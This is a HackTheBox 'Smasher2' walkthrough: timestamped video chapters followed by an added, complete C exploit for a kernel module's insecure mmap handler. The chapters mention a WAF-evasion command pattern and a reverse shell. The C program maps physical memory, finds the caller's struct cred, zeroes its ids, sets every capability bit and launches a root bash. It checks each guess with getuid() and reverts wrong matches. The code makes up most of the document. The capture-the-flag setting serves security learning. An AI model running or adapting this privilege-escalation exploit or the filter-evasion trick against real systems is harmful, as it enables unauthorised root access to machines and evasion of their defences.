HackTheBox - Smasher2

15,436 views

Published on Dec 28, 2019

00:58 - Begin of Recon
02:30 - Using Wireshark to see why Nmap said HTTP 403
06:15 - Running GoBuster to identify /backup
07:05 - Performing a DNS Zone Transfer with dig axfr
08:50 - Manually playing with the login form to hunt for SQL Injection
10:50 - Downloading files out of /backup, opening auth.py with vim and ses.so with ghidra
16:42 - Examining /auth endpoint
18:10 - Examining ses.so in Ghidra
20:31 - Renaming variables from Ghidra's decompiler to try to make sense of the code
30:00 - Examining get_internal_usr and pwd to discover the bug
33:20 - Using GDB to debug Python and step through ses.so, which makes analyzing decompiled code easier
36:50 - First time attaching the debugger - Seg faults for some reason.
38:30 - Attaching the debugger again, this time it works. Explaining important registers
39:00 - Stepping through the code trying to make sense of registers. This part may not make sense.
### The RDI Value in the STRCMP was from my python script calling ses.so -- RSI is what the program thinks the password is. So if in the Python Script I used ippsec:ippsec, then it would be STRCMP('ippsec','ippsec').
51:50 - Logging in with Administrator:Administrator and then looking at auth.py to see how the /api works
54:25 - Getting command execution
55:50 - Trying to get a Reverse Shell, discovering a WAF, identifying the bad characters
56:50 - Configuring burp to have a hotkey to "Issue Repeater Request" so we don't have to click send
57:18 - Tips to avoid a web filter/WAF ex: {echo,test}|{ba''se64,-''-d}
1:01:00 - Getting a reverse shell, then upgrading to an SSH terminal by dropping an SSH key
1:05:05 - Running LinPEAS to identify paths to privesc
1:09:10 - Downloading the custom Linux Kernel Module: DHID, then examining it in Ghidra
1:12:00 - Looking at Snowscan's blog to test the dev_read function
1:14:15 - Looking at the dev_mmap call
1:15:20 - Looking at the MWR Labs paper on insecure MMAP use in kernel modules
1:16:30 - Explaining what we are going to do - Rewrite credentials in memory
1:19:20 - Going over the first MMAP Call to map memory
1:21:05 - Setting an SSH config to make it easier to ssh and scp into Smasher2
1:26:00 - Searching for a credential structure in memory
1:31:20 - Running GetUID to see if the cred structure we modified is ours, if not set it back
1:34:00 - Setting capabilities and running bash upon getting root
1:36:10 - Showing what would have happened if we did not revert credentials back to the original.
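The 1:26:00 to 1:36:10 chapters describe the privilege-escalation technique: map physical memory through the kernel module's unchecked mmap handler, scan the mapping for a record shaped like our own struct cred, zero the id fields, check with getuid() whether it was really our cred, and put the bytes back if it was not. The following is an added example written for this page, not IppSec's exploit or the DHID module's code. It assumes the device node is /dev/dhid, that the driver maps any requested length, and the struct cred layout of 4.x kernels (eight 32-bit ids uid, gid, suid, sgid, euid, egid, fsuid, fsgid, then securebits, then five 64-bit kernel_cap_t fields); verify all three against the target before use. The search, patch and restore logic is separated from the mmap so it can be exercised on a constructed buffer.

```c
/* Cred-overwrite helper for an insecure mmap handler (added example, not the page's code).
 * Layout assumption (4.x kernel struct cred, after the atomic usage counter):
 *   uid gid suid sgid euid egid fsuid fsgid | securebits | 5 x kernel_cap_t (2 words each) */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define CRED_ID_WORDS     8   /* uid .. fsgid */
#define CRED_CAP_FIRST    9   /* first word of cap_inheritable, after securebits */
#define CRED_CAP_WORDS   10   /* inheritable, permitted, effective, bset, ambient */
#define CRED_PATCH_WORDS (CRED_CAP_FIRST + CRED_CAP_WORDS)

/* Word index of the first cred-shaped record at or after 'start', or -1. */
static long find_cred(const uint32_t *mem, size_t words, size_t start,
                      uint32_t uid, uint32_t gid)
{
    if (words < CRED_PATCH_WORDS) return -1;
    for (size_t i = start; i + CRED_PATCH_WORDS <= words; i++) {
        if (mem[i] == uid && mem[i + 1] == gid && mem[i + 2] == uid && mem[i + 3] == gid &&
            mem[i + 4] == uid && mem[i + 5] == gid && mem[i + 6] == uid && mem[i + 7] == gid)
            return (long)i;
    }
    return -1;
}

/* Keep a copy so a wrong guess (another process's cred) can be undone. */
static void save_cred(const uint32_t *mem, size_t idx, uint32_t *saved)
{
    memcpy(saved, mem + idx, CRED_PATCH_WORDS * sizeof(uint32_t));
}

/* Zero all eight ids (root) and set every capability bit; securebits is left alone. */
static void patch_cred(uint32_t *mem, size_t idx)
{
    for (size_t i = 0; i < CRED_ID_WORDS; i++) mem[idx + i] = 0;
    for (size_t i = 0; i < CRED_CAP_WORDS; i++) mem[idx + CRED_CAP_FIRST + i] = 0xffffffffu;
}

static void restore_cred(uint32_t *mem, size_t idx, const uint32_t *saved)
{
    memcpy(mem + idx, saved, CRED_PATCH_WORDS * sizeof(uint32_t));
}

/* Constructed sample region (not real kernel memory): one cred-shaped record at word 20
 * for uid 1000 / gid 1001. Returns the index found after checking patch and restore, -1 on error. */
static long run_sample(void)
{
    uint32_t buf[64], saved[CRED_PATCH_WORDS];
    for (size_t i = 0; i < 64; i++) buf[i] = 0xdeadbeefu;
    for (size_t i = 0; i < CRED_ID_WORDS; i++) buf[20 + i] = (i % 2 == 0) ? 1000u : 1001u;
    for (size_t i = 28; i < 20 + CRED_PATCH_WORDS; i++) buf[i] = 0; /* securebits + caps */

    long idx = find_cred(buf, 64, 0, 1000, 1001);
    if (idx != 20 || find_cred(buf, 64, 21, 1000, 1001) != -1) return -1;
    save_cred(buf, (size_t)idx, saved);
    patch_cred(buf, (size_t)idx);
    if (buf[20] != 0 || buf[27] != 0 || buf[28] != 0) return -1;            /* ids zeroed, securebits kept */
    if (buf[29] != 0xffffffffu || buf[38] != 0xffffffffu || buf[39] != 0xdeadbeefu) return -1;
    restore_cred(buf, (size_t)idx, saved);
    for (size_t i = 20; i < 20 + CRED_PATCH_WORDS; i++)
        if (buf[i] != ((i < 28) ? ((i % 2 == 0) ? 1000u : 1001u) : 0)) return -1;
    return idx;
}

int main(void)
{
    const char *dev = "/dev/dhid";     /* assumption: node exposed by the DHID module */
    size_t len = 0xf0000000UL;         /* assumption: driver maps whatever length is asked */
    int fd = open(dev, O_RDWR);
    if (fd < 0) { perror("open"); return 1; }
    uint32_t *mem = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }

    uint32_t uid = getuid(), gid = getgid(), saved[CRED_PATCH_WORDS];
    size_t words = len / sizeof(uint32_t);
    long idx = 0;
    while ((idx = find_cred(mem, words, (size_t)idx, uid, gid)) >= 0) {
        save_cred(mem, (size_t)idx, saved);
        patch_cred(mem, (size_t)idx);
        if (getuid() == 0) {           /* the record was our cred: we are root now */
            printf("cred at word %ld, spawning shell\n", idx);
            execl("/bin/bash", "bash", "-p", (char *)NULL);
            perror("execl"); return 1;
        }
        restore_cred(mem, (size_t)idx, saved); /* another task's cred: put it back, keep scanning */
        idx += 1;
    }
    fprintf(stderr, "no matching cred found\n");
    return 1;
}
```

The restore step is what the 1:36:10 chapter is about: a false match that is left zeroed corrupts some other process's credentials, so every candidate is reverted unless getuid() confirms it was ours.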
